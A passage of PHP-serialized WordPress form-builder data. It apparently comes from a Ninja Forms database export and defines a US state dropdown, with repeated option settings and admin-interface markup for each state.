dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:46;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Vermont\";s:5:\"value\";s:2:\"VT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:47;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Virginia\";s:5:\"value\";s:2:\"VA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:48;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"Washington\";s:5:\"value\";s:2:\"WA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:49;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:13:\"West Virginia\";s:5:\"value\";s:2:\"WV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:50;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Wisconsin\";s:5:\"value\";s:2:\"WI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:51;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Wyoming\";s:5:\"value\";s:2:\"WY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:52:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:24:\"Please Choose Your State\";s:5:\"value\";s:24:\"Please Choose Your State\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Alabama\";s:5:\"value\";s:2:\"AL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:6:\"Alaska\";s:5:\"value\";s:2:\"AK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Arizona\";s:5:\"value\";s:2:\"AZ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Arkansas\";s:5:\"value\";s:2:\"AR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"California\";s:5:\"value\";s:2:\"CA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Colorado\";s:5:\"value\";s:2:\"CO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:11:\"Connecticut\";s:5:\"value\";s:2:\"CT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Delaware\";s:5:\"value\";s:2:\"DE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:9;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:20:\"District of Columbia\";s:5:\"value\";s:2:\"DC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Florida\";s:5:\"value\";s:2:\"FL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 